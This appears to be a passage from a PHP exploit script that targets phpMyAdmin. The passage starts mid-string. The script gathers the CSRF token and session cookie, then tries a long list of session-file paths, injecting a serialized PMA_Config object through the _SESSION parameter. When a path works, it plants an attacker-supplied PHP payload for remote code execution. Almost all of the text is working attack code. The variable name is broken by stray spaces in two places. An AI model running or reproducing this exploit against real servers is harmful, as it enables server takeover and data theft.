'; //PHP code to execute /*Settings*/ /*-------------------------------------------EXPLOIT CODE-------------------------------------------*/ $count_redirects = 0; $max_redirects = 5; //отправляем http-данные //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1 function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8', $other_headers= '', $timeout = 30, $show = 0, $follow_redirect=0) { global $count_redirects,$max_redirects; $return = ''; $feof_count = 0; $parsed_url = parse_url($url); $site = $parsed_url['host']; $path = $parsed_url['path']; $query = $parsed_url['query']; if(preg_match('@_$@i',$query) && !preg_match('@_$@i',$url)) $query = rtrim($query,'_'); if(preg_match('@_$@i',$path) && !preg_match('@_$@i',$url)) $path = rtrim($path,'_'); ($method == 'GET' && !empty($data)) ? $path .= '?'.$data : ''; ($method == 'GET' && !empty($query) && empty($data)) ? $path .= '?'.$query : ''; ($method == 'POST' && !empty($query)) ? $path .= '?'.$query : ''; if($fp = fsockopen($site, 80, $errno, $errstr, $timeout)) { ($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n"; $out .= "Host: $site\r\n"; $out .= "Content-type: application/x-www-form-urlencoded\r\n"; $out .= "Connection: Close\r\n"; $out .= "User-Agent: $ua_string\r\n"; !empty($referer_string) ? $out .= "Referer: $referer_string\r\n" : ''; !empty($cookie_string) ? $out .= "Cookie: $cookie_string\r\n" : ''; !empty($other_headers) ? $out .= $other_headers : ''; ($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n"; ($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out); while (!feof($fp)) { if($feof_count >=10000) break; $return .= fread($fp, 4800); ++$feof_count; } fclose($fp); if($follow_redirect) { if($count_redirects<$max_redirects) { if(preg_match('@Location: (.+)@i',$return,$redirect_match)) { $count_redirects++; $return = send_data($method, $redirect_match[1], $data, $referer_string, $cookie_string, $ua_string, $other_headers, $timeout, $show, $follow_redirect); $count_redirects = 0; } } else return 'Max redirects = '.$max_redirects; } if($show == 1) { $return = explode("\r\n\r\n",$return); $return = $return[1]; } elseif($show == 2) { $return = explode("\r\n\r\n",$return); $return = $return[0]; } return $return; } else return array('errno' => $errno, 'errstr' => $errstr); } $pmaurl = rtrim($pmaurl,'/').'/index.php'; //Regards to asddas $sess_path = array('/tmp/', '/var/tmp/', '/var/lib/php/', '/var/lib/php4/', '/var/lib/php5/', '/var/lib/php/session/', '/var/lib/php4/session/', '/var/lib/php5/session/', '/shared/sessions', '/var/php_sessions/', '/var/sessions/', '/tmp/php_sessions/', '/tmp/sessions/', '../../../tmp/', '../../../../tmp/', '../../../../../tmp/', '../../../../../../tmp/', '../../../../../../../tmp/', '../../../temp/', '../../../../temp/', '../../../../../temp/', '../../../../../../temp/', '../../../../../../../temp/', '../../../sessions/', '../../../../sessions/', '../../../../../sessions/', '../../../../../../sessions/', '../../../../../../../sessions/', '../../../phptmp/', '../../../../phptmp/', '../../../../../phptmp/', '../../../../../../phptmp/', '../../../../../../../phptmp/'); //1. Token, Session name and Cookies $token_page = send_data('GET',$pmaurl); preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array); $token = $token_array[1]; preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array); $cookie_array = $cookie_array[1]; $cookie_array = implode("; ",$cookie_array); preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is',$token_page,$session_array); $session = $session_array[1]; //2. Inject into session testing $sess_test_page = ''; $o = 0; $good_inj = false; do { $inj = $sess_path[$o].'sess_'.$session; $query = $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($inj).':"'.$inj.'";}}'); $sess_test_page = send_data('GET',$query,'',$pmaurl,$cookie_array); $sess_test_page2 = send_data('GET',$pmaurl.'?token='.$token,'',$pmaur l,$cookie_array); if(stristr($sess_test_page2,'PMA_Config')) { $good_inj = $inj; flush(); print '[+] '.$inj.' - good path
'; break; } else { flush(); print '[-] '.$inj.' - bad path
'; } $o++; } while($o < count($sess_path)); if($good_inj) { $query = $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($good_inj).':"'.$good_inj.'";}}').'&_SESSION[payload]='.urlencode($payload); $sess_test_page = send_data('GET',$query,'',$pmaurl,$cookie_array); $sess_test_page2 = send_data('GET',$pmaurl.'?token='.$token,'',$pmaur l,$cookie_array); print $sess_test_page2; } else die('[+] Session path was not found');